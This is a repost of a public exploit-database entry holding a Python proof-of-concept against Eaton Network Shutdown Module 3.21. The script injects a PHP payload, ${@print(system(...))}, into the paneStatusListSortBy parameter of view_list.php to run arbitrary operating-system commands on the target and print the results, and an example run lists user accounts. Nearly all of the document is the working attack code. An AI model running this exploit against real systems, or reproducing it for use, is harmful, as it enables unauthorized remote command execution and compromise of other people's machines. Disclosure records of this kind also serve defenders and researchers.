Eaton Network Shutdown Module 3.21 – Remote PHP Code Injection - 体验盒子

作者： Filip Waeytens

日期： 2013-12-06

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/30059/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

#!/usr/bin/env python

#

# Quick 'n' Dirty - Metasploit module didn't do it for me

# 2013 - Filip Waeytens - http://www.wsec.be

#

# Usage Example:

##~$ python eaton.py 192.168.1.9 "net user"

#

#User accounts for \\

#

#-------------------------------------------------------------------------------

#GuestLocalAdmin

#The command completed with one or more errors.

#

# Exploit Title: Eaton shutdown module php eval exploit

# Date: 5 dec2013

# Exploit Author: Filip Waeytens

# Vendor Homepage: powerquality.eaton.com

# Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp

# Version: 3.21

# Tested on: WIN

#References:

###Exploit Database: 23006

###Secunia Advisory ID: 49103

###Bugtraq ID: 54161

###Related OSVDB ID: 83200 83201

###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html

#

import httplib

import urllib

import sys

import BeautifulSoup

#### First argument is the target IP - port defaults to 4679

targetip = sys.argv[1]

command = sys.argv[2]

targetport=4679

#### if a command has spaces: put between double quotes, the next lines strip the quotes

if command.startswith('"') and string.endswith('"'):

command = command[1:-1]

#### build the urL to request

baserequest = "/view_list.php?paneStatusListSortBy="

wrappedcommand="${@print(system(\""+command+"\"))}"

ue_command = urllib.quote_plus(wrappedcommand)

#### send request

conn = httplib.HTTPConnection(targetip+":"+str(targetport))

conn.request("GET", baserequest+ue_command)

r1 = conn.getresponse()

#print "Getting answer: "

#print r1.status, r1.reason

#print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command

data1 = r1.read()

#### extract answer

soup = BeautifulSoup.BeautifulSoup(data1)

for p in soup.findAll("p"):

#print dir(p)

#strip first line

result = p.getText().split("Warning")[0]

print result.replace("Multi-source information on the power devices suppying the protected server","",1)